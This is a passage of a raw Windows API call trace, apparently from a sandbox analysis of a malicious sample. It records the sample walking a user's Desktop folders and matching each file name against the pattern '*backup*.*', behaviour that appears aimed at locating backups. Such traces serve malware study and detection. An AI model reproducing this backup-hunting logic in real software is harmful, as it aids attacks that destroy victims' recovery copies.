(HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.898] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*backup*.*") returned 0 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.898] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.898] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.898] FindClose (in: hFindFile=0x7437a0 | out: hFindFile=0x7437a0) returned 1 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaaa8 [0110.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.898] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a30d8 [0110.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a30d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a30d8 | out: hHeap=0x29a0000) returned 1 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaaa8 | out: hHeap=0x29a0000) returned 1 [0110.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970da0 [0110.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970da0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.899] PathMatchSpecW (pszFile="KTOu", pszSpec="*backup*.*") returned 0 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.899] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.899] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.899] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.899] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg" [0110.899] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.899] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.899] lstrcatW (in: lpString1="\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="\\LyMn8DqKE.jpg") returned="\\LyMn8DqKE.jpg" [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.899] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.899] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.900] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d20 [0110.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.900] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.900] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*backup*.*") returned 0 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.900] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.900] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.900] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.900] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif" [0110.900] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.900] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.900] lstrcatW (in: lpString1="\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="\\MB3JQQUgbwGVRNgeCA.gif") returned="\\MB3JQQUgbwGVRNgeCA.gif" [0110.900] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.900] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea318 [0110.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x38ea318, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.900] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea318 | out: hHeap=0x29a0000) returned 1 [0110.900] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.901] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*backup*.*") returned 0 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.901] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.901] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.901] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.901] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="O93_HCF.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx" [0110.901] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.901] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.901] lstrcatW (in: lpString1="\\", lpString2="O93_HCF.xlsx" | out: lpString1="\\O93_HCF.xlsx") returned="\\O93_HCF.xlsx" [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ca0 [0110.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ca0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.901] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0110.901] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.902] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*backup*.*") returned 0 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.902] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.902] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Oar504.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif" [0110.902] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.902] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.902] lstrcatW (in: lpString1="\\", lpString2="Oar504.gif" | out: lpString1="\\Oar504.gif") returned="\\Oar504.gif" [0110.902] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.902] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.902] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.902] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970de0 [0110.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970de0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.902] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970de0 | out: hHeap=0x29a0000) returned 1 [0110.902] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*backup*.*") returned 0 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0110.902] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.902] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.902] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.903] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.903] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.903] lstrcatW (in: lpString1="\\", lpString2="p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.903] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2=".") returned 1 [0110.903] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2="..") returned 1 [0110.903] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*" [0110.903] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743520 [0110.903] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\." [0110.903] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.903] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.903] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="\\p B1LdDcHaeS\\.") returned="\\p B1LdDcHaeS\\." [0110.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.903] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.903] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.." [0110.903] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.903] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.903] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="\\p B1LdDcHaeS\\..") returned="\\p B1LdDcHaeS\\.." [0110.903] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.904] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, 